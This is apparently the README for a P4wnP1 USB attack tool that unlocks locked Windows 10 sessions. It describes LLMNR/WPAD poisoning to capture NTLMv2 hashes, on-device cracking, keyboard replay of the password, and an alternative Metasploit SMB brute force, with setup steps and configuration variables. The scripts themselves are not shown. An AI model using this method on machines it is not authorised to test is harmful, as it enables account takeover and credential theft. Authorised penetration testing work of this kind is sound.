A P4wnP1 A.L.O.A. payload that unlocks a locked Windows 10 session without prior knowledge of the user's password. It does this by poisoning LLMNR/NBT-NS traffic over a spoofed USB network adapter, capturing the NTLMv2 hash, cracking it offline on the device itself, then replaying the recovered password through a HID keyboard, all automatically, in one plug-in sequence.
A second script (smbrute.sh) provides an alternative path using SMB brute
force via Metasploit rather than hash capture.
For educational and authorised penetration testing purposes only.
- The P4wnP1 presents itself as a USB RNDIS network adapter and a HID keyboard simultaneously.
- Windows automatically assigns the adapter a default route. Combined with WPAD poisoning and static route spoofing, this routes a portion of the target's network traffic through the device.
- Responder intercepts LLMNR/NBT-NS/WPAD requests and captures NTLMv2 hashes, which Windows sends automatically when probing network resources.
- The captured hash is stored in the Responder SQLite database. Once a hash is detected, Responder is stopped and John the Ripper runs against the hash file.
- On a successful crack, the recovered plaintext password is typed into the
locked session via the HID keyboard emulator. The script sends
CTRL+ALT+DELfirst to bring the credential prompt forward, then types the password and presses Enter.
- Same USB gadget setup: RNDIS + HID keyboard.
- Once the target receives a DHCP lease, the script resolves its IP and checks whether port 445 is open using Nmap.
- If SMB is reachable, Metasploit's
smb_loginauxiliary module runs a credential brute force using the provided wordlists. - On a successful login, the found password is replayed via HID in the same way as the hash capture path.
- P4wnP1 A.L.O.A. (Raspberry Pi Zero W)
- Responder (included in P4wnP1)
- John the Ripper (for the hash capture path)
- Nmap and Metasploit (for the SMB brute force path)
- Wordlists placed at
/usr/local/P4wnP1/scripts/wordlists/users.txtpasswords.txt
Copy the scripts to the P4wnP1 scripts directory:
cp Win10_LockPicker.sh /usr/local/P4wnP1/scripts/
cp smbrute.sh /usr/local/P4wnP1/scripts/
chmod +x /usr/local/P4wnP1/scripts/Win10_LockPicker.sh
chmod +x /usr/local/P4wnP1/scripts/smbrute.shIn the P4wnP1 web interface, configure the USB gadget settings to expose RNDIS and HID keyboard, then create a trigger that launches the chosen script when a DHCP lease is issued.
The keyboard layout is set to French (fr) in both scripts. Change the lang
variable and the layout() call in the generated HID script if your target
uses a different layout.
Both scripts expose a set of variables at the top that control behaviour.
| Variable | Default | Description |
|---|---|---|
USE_RNDIS |
true |
Enable RNDIS network adapter emulation |
USE_HID |
true |
Enable HID keyboard emulation |
lang |
fr |
Keyboard layout for the target |
IF_IP |
172.16.0.1 |
IP address of the P4wnP1 interface |
IF_MASK |
255.255.255.252 |
Subnet mask |
IF_DHCP_RANGE |
172.16.0.2,... |
DHCP range offered to the target |
ROUTE_SPOOF |
true |
Inject static routes to maximise hash capture |
WPAD_ENTRY |
true |
Advertise a WPAD proxy via DHCP |
CRACK |
true |
Run John the Ripper after hash capture |
LOGIN |
true |
Type the recovered password via HID |
| Variable | Default | Description |
|---|---|---|
WORDLIST_DIR |
/usr/local/P4wnP1/scripts/wordlists |
Directory containing wordlists |
LOOTBASE |
/usr/local/P4wnP1/www/loot/smbrute/ |
Directory where results are saved |
Win10_LockPicker-by-Infinition/
Win10_LockPicker.sh # Hash capture + crack + HID replay
smbrute.sh # SMB brute force + HID replay
README.md
Wordlists, loot directories, and the temporary HID scripts generated at runtime
are excluded from version control via .gitignore.
This tool is intended for use on systems you own or have explicit written authorisation to test. Plugging this into a machine without permission is illegal in most jurisdictions. The author takes no responsibility for misuse.
MIT